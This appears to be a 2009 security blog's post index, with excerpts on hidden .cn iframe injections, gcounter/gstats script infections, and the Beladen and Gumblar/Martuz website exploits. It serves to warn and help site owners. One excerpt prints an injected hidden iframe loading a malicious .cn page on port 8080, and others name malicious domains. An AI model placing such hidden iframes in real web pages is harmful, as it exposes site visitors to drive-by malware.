
Happy Birthday Unmask Parasites!

01 Jul 09   Filed in Unmask Parasites with 2 Comments

Exactly one year ago I purchased the UnmaskParasites.com domain name and made the first early beta version of my new service available for public testing.

One year later Unmask Parasites is still in beta but now it’s a much more mature service that has proven its viability.

Many interesting things happened during this year. I'm not a good enough writer to make it interesting reading, so I'll only list some milestones, facts and statistics here.

Security Lesson From a Kenyan Marathon Runner

30 Jun 09   Filed in General with 0 Comments

If you have a site/blog but you are not a techie and don’t know much about website security, you might want to read this article written by a Kenyan marathon runner about how his blog was hacked.

He received an email from Google saying that his site had been temporarily removed from the search index because it contained hidden spam links and thus violated Google's guidelines.

Hidden CN Iframes Are Still Prevalent

25 Jun 09   Filed in Website exploits with 6 Comments

This post is a reminder that .cn iframe attacks are still among the leaders.

The URLs of malicious iframes change over time. Hackers introduce new suffixes (campaigns?) like mozila, banner, cocacola, pepsi, and add more and more domain names.

Port 8080

Since the pepsi campaign they started using port 8080 in the URLs.

The current form of the malicious code looks like this:

<iframe src="http:// namegamestore .cn:8080/index.php" width=118 height=195 style="visibility: hidden"></iframe>

It is usually injected at the bottom of index (home) pages.

GStats .cn and GCounter .cn - Malicious Code in .js Files

22 Jun 09   Filed in Tips and Tricks, Website exploits with 0 Comments

This must not be a new attack (I've found an almost year-old article that mentions gcounter iframes), but I started to notice it this past weekend: first on Google's Webmaster Forums, then in the Unmask Parasites logs. So I guess it's a new wave of the attack.

GCounter .cn

When I first encountered a site infected by gcounter, I checked it with Unmask Parasites. Nothing suspicious was found except for the fact that the domain name was blacklisted by Google. I checked the diagnostic page and found this clue:

Malicious software is hosted on 1 domain(s), including gcounter.cn/.


Beladen - Elusive Web Server Exploit. (information for site owners and hosting providers)

18 Jun 09   Filed in Website exploits with 15 Comments

There has not been much buzz about the recent Beladen attack. Although some sources estimated 40,000 infected web sites, it was clearly not as prominent as Gumblar. To my mind, it's because of the elusive nature of the Beladen exploit. It is very difficult to detect. It works intermittently. Only a small percentage of site visitors are exposed to malicious content. Many security scanners just overlook it. Most likely the spread of this attack is underestimated.

In this post, I'll list every fact I know about the Beladen exploit and hope you will add any missing information in the comments. This format proved to be very fruitful in my recent post about the Gumblar exploit, where your 150+ comments made my article the most informative online resource about that attack, one that most other sites (including major media) referred to.

I hope the information you will find here can help site owners and hosting providers understand the nature of the exploit and get rid of it.

Blog Moved to VPS

06 Jun 09   Filed in General with 4 Comments

Hi,

To have more things under my control I moved this blog from a shared hosting plan to a VPS (virtual private server).

However, when I imported WordPress posts to the new location, things didn't go as expected and the structure of threaded comments got broken. When you read popular posts with active discussions, you might not be able to identify who is responding to whom. In new posts, threaded comments should be working.

Gumblar/Martuz Aftermath

26 May 09   Filed in Tips and Tricks, Website exploits with 9 Comments

The Gumblar/Martuz epidemic is currently in decline. Compared with last week, this week Unmask Parasites registers only a small fraction of Gumblar-infected web sites. And I don't see any new script mutations.

The "martuz .cn" domain no longer resolves and "gumblar .cn" is defunct (the domain is currently parked). This has stopped the surge of new infections. And the increased global awareness helped webmasters identify the problem and get rid of it.

Recovered sites are still blacklisted

Nonetheless, I can still see that many websites recovered from the gumblar/martuz attack are still blacklisted by Google. Their Safe Browsing diagnostic pages say something like:

Security Issues With the Blog

22 May 09   Filed in General, Unmask Parasites with 2 Comments

Yesterday I was notified that my blog's web pages sometimes contain malicious scripts. I had to shut down the blog and investigate the issue. Sorry for the inconvenience. I didn't want to expose you to any threats.

The Unmask Parasites online service was not affected (it is hosted in a different location, and is very secure). It worked all that time. And during the investigation, my blog redirected visitors to http://www.UnmaskParasites.com

Martuz .cn - New Incarnation of the Gumblar Exploit. So What’s New?

18 May 09   Filed in General, Website exploits with 38 Comments

Gumblar is dead

Many people have noticed that "gumblar .cn" no longer resolves. The site cannot be accessed. Thus the gumblar script is no longer able to load the malicious payload and infect new computers and websites. Great!

Meet the Martuz

The loss of the gumblar .cn domain name can't stop hackers. They have slightly modified the script and now inject a new version that loads malicious content from a new domain: martuz .cn (95 .129 .145 .58).

A Few More Facts About the Gumblar Attack From SophosLab and ScanSafe.

15 May 09   Filed in General with 13 Comments

The Gumblar exploit seems to be the biggest exploit I’ve ever reviewed in my blog. About a thousand visitors come to read my article about Gumblar every day. This exploit accounts for about 80% of positives on Unmask Parasites and I still don’t see any sign of its decline.

I found some more interesting facts about this exploit in SophosLab’s and ScanSafe’s blogs and would like to share them with you.